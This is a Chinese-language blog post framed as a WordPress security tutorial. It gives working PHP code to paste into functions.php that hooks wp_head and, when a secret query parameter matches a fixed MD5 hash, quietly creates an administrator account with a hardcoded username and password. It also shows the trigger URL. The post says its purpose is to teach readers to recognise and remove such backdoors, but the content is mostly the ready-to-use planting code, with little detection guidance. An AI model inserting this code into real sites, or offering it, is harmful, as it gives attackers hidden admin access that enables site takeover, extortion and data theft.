[web安全]WordPress程序增加网站后门

肯定有很多人网站或者服务器被黑过,但是刚接触网站时并不懂编程,所以无法自己排除后门,今天给大家带来的是如何在Wordpress程序里增加后门的教程!该教程并不是教会大家如何给程序留后门或者干坏事,而是教大家如何正确的清除后门,正确的认识后门!

代码:

<?php
add_action( 'wp_head', 'my_backdoor' );
 
function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'backdoor' ) ) {
            $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

functions.php文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://

xxx.xxx.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

大家在代码中见到该类型的PHP语句特征记得自我清除一下,避免被他人勒索或被清站的风险!

小编说:

肯定会有很多网友说如果说出来了,大家肯定都会去给网站源码加后门。其实大家对后门的认识并不大,只有真正懂得如何给网站加后门了,才可以正确理解和自我清除后门,以及遇到后门时该如何解决。

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
发表回复 抢沙发

请登录后发表评论

    暂无评论内容